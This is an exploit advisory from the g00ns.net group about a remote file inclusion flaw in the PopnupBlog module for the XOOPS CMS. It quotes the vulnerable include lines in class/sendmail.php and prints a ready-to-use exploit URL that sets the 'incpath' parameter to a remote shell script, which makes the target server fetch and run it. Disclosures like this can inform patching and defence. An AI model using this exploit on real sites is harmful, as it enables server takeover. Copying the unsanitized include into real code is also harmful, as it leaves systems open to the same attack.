##############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
##############################################################################################
#INFO:
#Program Title ###############################################################################
#PopnupBlog (XOOPS Module) Remote File Inclusion Vulnerability
#
#Description #################################################################################
#Blogging module for XOOPS CMS
#
#Vuln Code ###################################################################################
#In /class/sendmail.php
# include_once $incpath.'class/log.php';
# include_once $incpath.'class/mbstrings.php';
#
#Script Download ##############################################################################
#http://www.bluemooninc.biz/~xoops2/modules/mydownloads/visit.php?cid=3&lid=35
#
#Exploit ######################################################################################
#
#http://[ site ]/modules/popnupblog/class/sendmail.php?incpath=[ shell ]?
#
#Credits ######################################################################################
#FiSh for vulnerability
#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
#        grumpy, and everyone else at g00ns.net
###############################################################################################